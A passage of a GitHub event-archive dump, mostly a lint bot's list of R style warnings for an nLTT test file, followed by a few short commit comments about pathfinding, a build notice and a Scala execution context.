\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"mcmc_nltt: phy must be of class 'phylo'\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:44:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1,0.01), c(TRUE,TRUE), \n                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:58:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1,0.01), c(TRUE,TRUE), \n                                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:24:64:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1,0.01), c(TRUE,TRUE), \n                                                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:25:33:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​      iterations = 10000, burnin=1000, thinning=1, sigma=0.05))[[1]],\n                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:25:48:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​      iterations = 10000, burnin=1000, thinning=1, sigma=0.05))[[1]],\n                                              ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:25:57:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​      iterations = 10000, burnin=1000, thinning=1, sigma=0.05))[[1]],\n                                                       ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1,0.01), c(TRUE,TRUE),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"mcmc_nltt: initial parameter values have to be above zero\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:31:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tML2[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:31:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:31:52:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Commas should always have a space after.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1,0.01), c(TRUE,TRUE),\n                                                   ^\n```\n[tests/testthat/test_mcmc_nltt.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.001\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:32:30:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:32:46:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:32:63:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:33:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:35:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^\n```\n[tests/testthat/test_mcmc_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L37) *style:* **lines should not be more than 80 characters.**\n```r\n​\texpect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:38:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.001\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:38:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L38) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:38:85:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                                                   ~^\n```\n[tests/testthat/test_mcmc_nltt.R:38:101:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                                                                   ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:38:118:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5))[[1]],\n                                                                                                                    ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:39:87:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n                                                                                     ~^\n```\n[tests/testthat/test_mcmc_nltt.R:39:103:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n                                                                                                     ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:39:120:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n                                                                                                                      ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:39:131:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.01))[[1]],\n                                                                                                                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:47:11:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:47:36:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:47:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:57:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                        ^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:71:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                      ^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:81:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:48:11:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:48:36:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:47:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:57:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                        ^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:71:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                      ^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:81:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:50:15:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tLL_BD <- function(params, phy) {\n             ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:51:21:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                   ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:51:63:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                                                             ~^\n```\n[tests/testthat/test_mcmc_nltt.R:53:24:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:54:24:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:55:28:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:59:42:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L59) *style:* **Commas should always have a space after.**\n```r\n​\t\tmcmc_nltt( q, LL_BD, c(1, 0.0), c(TRUE,TRUE),\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:60:30:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:60:46:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:60:63:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:65:51:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L65) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tmcmc_nltt( 42, LL_BD, c(1, 0.01), c(TRUE, TRUE), \n                                                  ^\n```\n[tests/testthat/test_mcmc_nltt.R:66:30:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:66:46:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:66:63:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:71:47:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tmcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:72:30:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:72:46:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:72:63:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                             ~^~\n```"}},"created_at":"2016-09-14T12:03:09Z"}
{"id":"4561518703","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19017651,"position":null,"line":null,"path":null,"commit_id":"8e0bb60f371489e6792d0cc5a2949cf825a8eb05","created_at":"2016-09-14T12:03:40Z","updated_at":"2016-09-14T12:03:40Z","body":"Pathfinder is very CPU expensive .. so you need calc path once and serialise it in memory. never recalculate."}},"created_at":"2016-09-14T12:03:40Z"}
{"id":"4561521990","type":"CommitCommentEvent","actor":{"login":"whalo"},"repo":{"name":"whalo/greenhat"},"payload":{"comment":{"id":19017655,"position":null,"line":null,"path":null,"commit_id":"6d5a73962efb6a91c09fd5ef566d315fc8c2cfd5","created_at":"2016-09-14T12:04:24Z","updated_at":"2016-09-14T12:04:24Z","body":"update"}},"created_at":"2016-09-14T12:04:24Z"}
{"id":"4561523938","type":"CommitCommentEvent","actor":{"login":"dead-horse"},"repo":{"name":"node-modules/urllib"},"payload":{"comment":{"id":19017661,"position":34,"line":228,"path":"lib/urllib.js","commit_id":"094b3b3eb29f570873de8232aac8e33b3f5a19d2","created_at":"2016-09-14T12:04:50Z","updated_at":"2016-09-14T12:04:50Z","body":"额，上面还有一句注释。。"}},"created_at":"2016-09-14T12:04:50Z"}
{"id":"4561524178","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017662,"position":null,"line":null,"path":null,"commit_id":"193f7ba88cc44b13b0ed1d5284c39d42dd2f9e3f","created_at":"2016-09-14T12:04:52Z","updated_at":"2016-09-14T12:04:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 996](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13248&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T12:04:52Z"}
{"id":"4561525058","type":"CommitCommentEvent","actor":{"login":"yanns"},"repo":{"name":"johanandren/futiles"},"payload":{"comment":{"id":19017665,"position":13,"line":13,"path":"src/main/scala/markatta/futiles/CallingThreadExecutionContext.scala","commit_id":"d74757d1078f8efd60b5935ac4f261ac3012e2d1","created_at":"2016-09-14T12:05:06Z","updated_at":"2016-09-14T12:05:06Z","body":"This EC does not protect from stack overflow.\r\nYou may consider the `Trampoline` EC from play instead: https://github.com/playframework/playframework/blob/2d04ef1df2e1411e0bc6aa74e9e035bfcd3f3dc2/framework/src/play-streams/src/main/scala/play/api/libs/streams/Execution.scala#L31 ?"}},"created_at":"2016-09-14T12:05:06Z"}
